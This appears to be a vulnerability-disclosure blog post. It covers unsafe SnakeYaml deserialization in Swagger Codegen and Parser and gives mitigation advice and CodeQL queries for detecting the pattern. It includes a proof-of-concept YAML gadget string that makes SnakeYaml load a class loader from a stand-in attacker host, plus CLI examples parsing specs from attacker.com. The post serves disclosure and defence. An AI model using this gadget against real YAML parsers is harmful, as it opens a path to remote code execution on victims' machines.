In this post I describe a class of vulnerabilities that are caused by parsing untrusted YAML data with CodeQL, our code query language. In particular, this post describes how I discovered a vulnerability in the Swagger Code Generator, which uses SnakeYaml to parse YAML data in an unsafe way, enabling an arbitrary code execution attack. I illustrate the dangers of parsing unsanitized YAML with SnakeYaml, and show how this affects Swagger.

Swagger Codegen and Swagger Parser remote code execution vulnerability (CVE-2017-1000207 and CVE-2017-1000208)

Swagger is the world’s largest framework of API developer tools for the OpenAPI Specification (OAS). Swagger Codegen enables users to automatically generate server and client side REST API code in multiple languages, through a format called Open API definition. An Open API definition can be specified in either JSON or YAML format and the same Open API definition can be reused to generate APIs for different languages and frameworks.

This vulnerability in Swagger allows an attacker to execute arbitrary code when an untrusted OpenAPI/Swagger specification written in YAML format is parsed, due to the way Swagger invokes the SnakeYaml library. Unlike a previous vulnerability, which relies on the user to both generate code from the specification and then run the generated code, this vulnerability will execute arbitrary code when the specification is parsed with Swagger Codegen or Swagger Parser. In particular, this will happen when either the validate or the generate command is used on a vulnerable version of Swagger Codegen.

For example:

java -jar swagger-codegen-cli.jar generate -i http://attacker.com/untrusted-specification.yaml -l java

or:

java -jar swagger-codegen-cli.jar generate -i untrusted-specification.yaml -l java

When either of the above commands is executed on a specially-crafted specification containing malicious code, Swagger Codegen will execute that code upon parsing the YAML file.

Leading up to the release of Swagger Codegen 2.2.3, a new command was introduced: validate. I reported the vulnerability just before the release of Codegen 2.2.3, which means that the validate command was only briefly affected in unreleased versions of the Swagger Codegen source code. For example:

java -jar swagger-codegen-cli.jar validate -i http://attacker.com/untrusted-specification.yaml

Swagger Codegen is often executed using a YAML specification from an online resource (e.g., see Codegen example usage). An attacker with permissions to change such an online specification can execute arbitrary code on a user’s machine by uploading a specially-crafted YAML file.

Swagger Parser is a popular library that can be included in other applications to parse YAML data. Applications using the Swagger Parser library are also vulnerable to remote code execution when parsing YAML files from untrusted remote sources (see Usage in Swagger Parser’s documentation on GitHub).

Online code generators and validators built using Swagger Parser (e.g. generator.swagger.io, online.swagger.io and swagger editor) are potentially at risk. It is not difficult to construct YAML data to potentially exploit this vulnerability: consider evilpet.yml, a trivial modification of the petstore sample from Swagger Codegen.

Mitigation advice for Swagger users

Users are strongly advised to urgently update to the latest versions of Swagger Codegen (at the time of writing: version 2.2.3) and/or Swagger Parser (1.0.31 at the time of writing). This vulnerability is known under two CVE identifiers: CVE-2017-1000207 and CVE-2017-1000208.

Vendor response

SnakeYaml deserialization vulnerability

The vulnerability in Swagger is actually caused by unsafe use of SnakeYaml. SnakeYaml is a widely-used YAML parser written in Java. A lesser-known feature of SnakeYaml is its support for a special syntax that allows the constructor of any Java class to be called when parsing YAML data. For example, consider the following piece of Java code that uses SnakeYaml to parse a string in the malicious variable:

String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
                 + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
Yaml yaml = new Yaml();            // Unsafe instance of Yaml that allows any constructor to be called.
Object obj = yaml.load(malicious); // Make request to http://attacker.com

Upon parsing the malicious string, SnakeYaml will invoke the ScriptEngineManager constructor and make a request to http://attacker.com. This is actually a reasonably harmless example. As we’ve shown in previous blog posts about Java deserialization vulnerabilities: if attackers are able to call arbitrary Java constructors, this also allows them to execute any command on the affected machine. Examples of harmful payloads for various Java deserialization frameworks (including SnakeYaml) are widely available online, e.g. https://github.com/mbechler/marshalsec.

So, parsing unsanitized data using a Yaml object instantiated with the default constructor allows an attacker to execute arbitrary code on the victim’s machine, even with the default classpath containing just the JDK. This provides an attacker with a very powerful attack vector, affecting every application that uses SnakeYaml in an unsafe way. In recent years, vulnerabilities of this kind have been found in various open source projects, such as: RESTeasy (CVE-2016-9606), Apache Brooklyn (CVE-2016-8744), and Apache Camel (CVE-2017-3159).

Mitigation advice for SnakeYaml users

If you’re using SnakeYaml to parse YAML data, always make sure to only ever use a Yaml instance that is constructed either with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());

or an instance constructed with a Constructor specifying a specific class:

Yaml yaml = new Yaml(new Constructor(SafeClass.class));

Using the default constructor (without any parameters) will put your application and its users at risk.

The detection of unsafe parsing with SnakeYaml has recently been included in CodeQL (Deserialization of user-controlled data). Project maintainers should check if there is are any alerts of this type in their projects and review the results carefully.

Using CodeQL to find unsafe uses of SnakeYaml

With LGTM’s flexible code query technology CodeQL it is easy to write a query to find unsafe uses of SnakeYaml, including the one in Swagger Parser. First let us take a look at the code pattern that we want to identify here:

Object obj = yaml.load(malicious);

where malicious comes from a potentially untrusted source and yaml is an instance of the class org.yaml.snakeyaml.Yaml. The CodeQL Dataflow library provides a class RemoteUserInput which captures the concept of input provided by a remote user, this includes data provided through HTTP requests and connection sockets. So we only need to find calls to the load method of an instance of a Yaml class. To do so, we first define a Yaml class:

class Yaml extends RefType {
  Yaml() {
    this.hasQualifiedName("org.yaml.snakeyaml", "Yaml")
  }
}

This specifies that the QL class Yaml is a Java class in the package org.yaml.snakeyaml with the name Yaml. To identify a call to the load method, we make use of the MethodAccess class, which is an abstraction of a method call:

class SnakeYamlParse extends MethodAccess {
  SnakeYamlParse() {
    exists(Method m | m.getDeclaringType() instanceof Yaml and
      m.hasName("load") and
      m = this.getMethod()
    )
  }
}

Putting these together, we can use the following query to identify cases where remote user input is being parsed by a SnakeYaml parser:

from RemoteUserInput source, SnakeYamlParse parse
where source.flowsTo(parse.getArgument(0))
select source, parse

Note that in the second line, we use .flowsTo to track the RemoteUserInput, making sure that the argument of the load method comes from a remote source.

SnakeYaml can also be used in a safe way, by passing an instance of a SafeConstructor to the Yaml constructor. While our query makes sure that we only find cases where a remote source is parsed, it doesn’t differentiate between safe and unsafe parsers. Here’s an example of a safe invocation of the Yaml parser:

Yaml yaml = new Yaml(new SafeConstructor()); // Only allows a small white-listed set of constructors.
Object obj = yaml.load(malicious); // Safe to use

To filter out these safe cases from our query results, we want to exclude instances of Yaml that are constructed with a SafeConstructor passed to its constructor. Again, we first specify a model for the SafeConstructor class:

class SnakeYamlSafeConstructor extends RefType {
  SnakeYamlSafeConstructor() {
    this.hasQualifiedName("org.yaml.snakeyaml.constructor", "SafeConstructor")
  }
}

We can now use the ClassInstanceExpr class, which represents an expression that creates an object, to look for constructions of SafeConstructor instances.

class SafeSnakeYamlConstruction extends FlowSource, ClassInstanceExpr {
  SafeSnakeYamlConstruction() {
    this.getConstructedType() instanceof SnakeYamlSafeConstructor
  }
}

To identify cases where the Yaml object is safely constructed, we look for constructions of Yaml called with a SafeConstructor passed to the constructor argument:

class SafeYaml extends FlowSource, ClassInstanceExpr {
  SafeYaml() {
    this.getConstructedType() instanceof Yaml and
    exists(SafeSnakeYamlConstruction ssyc | ssyc.flowsTo(this.getArgument(0)))
  }
}

Here we use .flowsTo again to track an instance of SafeConstructor that goes into the constructor argument of Yaml. Putting these together, we can now extend the SnakeYamlParse class into the class UnsafeSnakeYamlParse that only identifies parsing from an unsafe Yaml instance:

class UnsafeSnakeYamlParse extends MethodAccess {
  UnsafeSnakeYamlParse() {
    exists(Method m | m.getDeclaringType() instanceof Yaml and
      m.hasName("load") and
      m = this.getMethod()
    ) and
    not exists(SafeYaml sy | sy.flowsTo(this.getQualifier()))
  }
}

Unsafe Parsing